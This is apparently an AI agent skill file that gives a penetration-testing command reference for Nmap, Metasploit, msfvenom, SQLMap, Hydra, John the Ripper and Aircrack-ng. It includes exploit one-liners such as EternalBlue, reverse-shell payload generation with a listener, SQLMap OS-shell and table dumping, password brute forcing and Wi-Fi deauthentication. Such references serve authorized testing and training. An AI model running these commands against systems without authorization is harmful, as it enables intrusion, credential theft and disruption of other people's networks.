pentest-commands

Provide a comprehensive command reference for penetration testing tools including network scanning, exploitation, password cracking, and web application…

INSTALLATION
npx skills add https://github.com/sickn33/antigravity-awesome-skills --skill pentest-commands
Run in your project or agent environment. Adjust flags if your CLI version differs.

SKILL.md

AUTHORIZED USE ONLY: Use this skill only for authorized security assessments, defensive validation, or controlled educational environments.

Pentest Commands

Purpose

Provide a comprehensive command reference for penetration testing tools including network scanning, exploitation, password cracking, and web application testing. Enable quick command lookup during security assessments.

Inputs/Prerequisites

  • Kali Linux or penetration testing distribution
  • Target IP addresses with authorization
  • Wordlists for brute forcing
  • Network access to target systems
  • Basic understanding of tool syntax

Outputs/Deliverables

  • Network enumeration results
  • Identified vulnerabilities
  • Exploitation payloads
  • Cracked credentials
  • Web vulnerability findings

Core Workflow

1. Nmap Commands

Host Discovery:

# Ping sweep (-sP is a legacy alias of -sn)
nmap -sP 192.168.1.0/24

# List targets without scanning them
nmap -sL 192.168.1.0/24

# Ping scan (host discovery only, no port scan)
nmap -sn 192.168.1.0/24

Port Scanning:

# TCP SYN scan (stealth; half-open, requires root)
nmap -sS 192.168.1.1

# Full TCP connect scan
nmap -sT 192.168.1.1

# UDP scan
nmap -sU 192.168.1.1

# All ports (1-65535)
nmap -p- 192.168.1.1

# Specific ports
nmap -p 22,80,443 192.168.1.1

Service Detection:

# Service versions
nmap -sV 192.168.1.1

# OS detection
nmap -O 192.168.1.1

# Comprehensive scan (-A = OS detection, version detection, default scripts, traceroute)
nmap -A 192.168.1.1

# Skip host discovery (treat every target as up)
nmap -Pn 192.168.1.1

NSE Scripts:

# Vulnerability scan (runs every script in the "vuln" category; noisy)
nmap --script vuln 192.168.1.1

# SMB enumeration
nmap --script smb-enum-shares -p 445 192.168.1.1

# HTTP enumeration
nmap --script http-enum -p 80 192.168.1.1

# Check EternalBlue (MS17-010)
nmap --script smb-vuln-ms17-010 192.168.1.1

# Check MS08-067
nmap --script smb-vuln-ms08-067 192.168.1.1

# SSH brute force (intrusive; may trigger account lockouts)
nmap --script ssh-brute -p 22 192.168.1.1

# FTP anonymous login check
nmap --script ftp-anon 192.168.1.1

# DNS brute force
nmap --script dns-brute 192.168.1.1

# HTTP methods
nmap -p80 --script http-methods 192.168.1.1

# HTTP headers
nmap -p80 --script http-headers 192.168.1.1

# SQL injection check
nmap --script http-sql-injection -p 80 192.168.1.1

Advanced Scans:

# Xmas scan
nmap -sX 192.168.1.1

# ACK scan (firewall rule detection)
nmap -sA 192.168.1.1

# Window scan
nmap -sW 192.168.1.1

# Traceroute
nmap --traceroute 192.168.1.1

2. Metasploit Commands

Basic Usage:

# Launch Metasploit
msfconsole

# Search for exploits
search type:exploit name:smb

# Use exploit
use exploit/windows/smb/ms17_010_eternalblue

# Show options
show options

# Set target
set RHOST 192.168.1.1

# Set payload
set PAYLOAD windows/meterpreter/reverse_tcp

# Run exploit
exploit

Common Exploits:

# EternalBlue
msfconsole -x "use exploit/windows/smb/ms17_010_eternalblue; set RHOST 192.168.1.1; exploit"

# MS08-067 (Conficker)
msfconsole -x "use exploit/windows/smb/ms08_067_netapi; set RHOST 192.168.1.1; exploit"

# vsftpd backdoor
msfconsole -x "use exploit/unix/ftp/vsftpd_234_backdoor; set RHOST 192.168.1.1; exploit"

# Shellshock
msfconsole -x "use exploit/linux/http/apache_mod_cgi_bash_env_exec; set RHOST 192.168.1.1; exploit"

# Drupalgeddon2
msfconsole -x "use exploit/unix/webapp/drupal_drupalgeddon2; set RHOST 192.168.1.1; exploit"

# PSExec
msfconsole -x "use exploit/windows/smb/psexec; set RHOST 192.168.1.1; set SMBUser user; set SMBPass pass; exploit"

Scanners:

# TCP port scan
msfconsole -x "use auxiliary/scanner/portscan/tcp; set RHOSTS 192.168.1.0/24; run"

# SMB version scan
msfconsole -x "use auxiliary/scanner/smb/smb_version; set RHOSTS 192.168.1.0/24; run"

# SMB share enumeration
msfconsole -x "use auxiliary/scanner/smb/smb_enumshares; set RHOSTS 192.168.1.0/24; run"

# SSH brute force
msfconsole -x "use auxiliary/scanner/ssh/ssh_login; set RHOSTS 192.168.1.0/24; set USER_FILE users.txt; set PASS_FILE passwords.txt; run"

# FTP brute force
msfconsole -x "use auxiliary/scanner/ftp/ftp_login; set RHOSTS 192.168.1.0/24; set USER_FILE users.txt; set PASS_FILE passwords.txt; run"

# RDP scanning
msfconsole -x "use auxiliary/scanner/rdp/rdp_scanner; set RHOSTS 192.168.1.0/24; run"

Handler Setup:

# Multi-handler for reverse shells
msfconsole -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.1.2; set LPORT 4444; exploit"

Payload Generation (msfvenom):

# Windows reverse shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f exe > shell.exe

# Linux reverse shell
msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f elf > shell.elf

# PHP reverse shell
msfvenom -p php/reverse_php LHOST=192.168.1.2 LPORT=4444 -f raw > shell.php

# ASP reverse shell
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f asp > shell.asp

# WAR file
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f war > shell.war

# Python one-liner payload (cmd/unix/reverse_python emits a "python -c" command string, not a standalone script)
msfvenom -p cmd/unix/reverse_python LHOST=192.168.1.2 LPORT=4444 -f raw > shell.py

3. Nikto Commands

# Basic scan
nikto -h http://192.168.1.1

# Comprehensive scan (check all CGI directories)
nikto -h http://192.168.1.1 -C all

# Output to file
nikto -h http://192.168.1.1 -output report.html

# Plugin-based scans
nikto -h http://192.168.1.1 -Plugins robots
nikto -h http://192.168.1.1 -Plugins shellshock
nikto -h http://192.168.1.1 -Plugins heartbleed
nikto -h http://192.168.1.1 -Plugins ssl

# Export to Metasploit
nikto -h http://192.168.1.1 -Format msf+

# Specific tuning
nikto -h http://192.168.1.1 -Tuning 1  # Interesting files only

4. SQLMap Commands

# Basic injection test
sqlmap -u "http://192.168.1.1/page?id=1"

# Enumerate databases
sqlmap -u "http://192.168.1.1/page?id=1" --dbs

# Enumerate tables
sqlmap -u "http://192.168.1.1/page?id=1" -D database --tables

# Dump table
sqlmap -u "http://192.168.1.1/page?id=1" -D database -T users --dump

# OS shell
sqlmap -u "http://192.168.1.1/page?id=1" --os-shell

# POST request
sqlmap -u "http://192.168.1.1/login" --data="user=admin&pass=test"

# Cookie injection (the * marks the injection point)
sqlmap -u "http://192.168.1.1/page" --cookie="id=1*"

# Tamper script (WAF bypass)
sqlmap -u "http://192.168.1.1/page?id=1" --tamper=space2comment

# Maximum risk and level (more tests; risk 3 includes potentially destructive payloads)
sqlmap -u "http://192.168.1.1/page?id=1" --risk=3 --level=5

5. Hydra Commands

# SSH brute force
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.1

# FTP brute force
hydra -l admin -P /usr/share/wordlists/rockyou.txt ftp://192.168.1.1

# HTTP POST form (third field is the failure string matched in the response)
hydra -l admin -P passwords.txt 192.168.1.1 http-post-form "/login:user=^USER^&pass=^PASS^:Invalid"

# HTTP Basic Auth
hydra -l admin -P passwords.txt 192.168.1.1 http-get /admin/

# SMB brute force
hydra -l admin -P passwords.txt smb://192.168.1.1

# RDP brute force
hydra -l admin -P passwords.txt rdp://192.168.1.1

# MySQL brute force
hydra -l root -P passwords.txt mysql://192.168.1.1

# Username list
hydra -L users.txt -P passwords.txt ssh://192.168.1.1

6. John the Ripper Commands

# Crack password file
john hash.txt

# Specify wordlist
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

# Show cracked passwords
john hash.txt --show

# Specify format
john hash.txt --format=raw-md5
john hash.txt --format=nt
john hash.txt --format=sha512crypt

# SSH key passphrase
ssh2john id_rsa > ssh_hash.txt
john ssh_hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

# ZIP password
zip2john file.zip > zip_hash.txt
john zip_hash.txt

7. Aircrack-ng Commands

# Monitor mode
airmon-ng start wlan0

# Capture packets
airodump-ng wlan0mon

# Target specific network
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon

# Deauth attack
aireplay-ng -0 10 -a AA:BB:CC:DD:EE:FF wlan0mon

# Crack WPA handshake
aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap

8. Wireshark/Tshark Commands

# Capture traffic
tshark -i eth0 -w capture.pcap

# Read capture file
tshark -r capture.pcap

# Filter by protocol
tshark -r capture.pcap -Y "http"

# Filter by IP
tshark -r capture.pcap -Y "ip.addr == 192.168.1.1"

# Extract HTTP data
tshark -r capture.pcap -Y "http" -T fields -e http.request.uri

Quick Reference

Common Port Scans

# Quick scan (100 most common ports)
nmap -F 192.168.1.1

# Full comprehensive (-A already implies -sV and -sC)
nmap -sV -sC -A -p- 192.168.1.1

# Fast with version detection
nmap -sV -T4 192.168.1.1

Password Hash Types (hashcat -m mode numbers)

Mode    Type
0       MD5
100     SHA1
1000    NTLM
1800    sha512crypt
3200    bcrypt
13100   Kerberoast (TGS-REP)

Constraints

  • Always have written authorization
  • Some scans are noisy and detectable
  • Brute forcing may lock accounts
  • Rate limiting on the target slows or blocks scanning and brute-force tools

Examples

Example 1: Quick Vulnerability Scan

nmap -sV --script vuln 192.168.1.1

Example 2: Web App Test

nikto -h http://target && sqlmap -u "http://target/page?id=1" --dbs

Troubleshooting

Issue                    Solution
Scan too slow            Increase the timing template (-T4, -T5)
Ports filtered           Try different scan types (see Advanced Scans)
Exploit fails            Check target version compatibility
Passwords not cracking   Try larger wordlists or rule-based mangling

When to Use

Use this skill when you need to run the workflow or actions described in the overview.
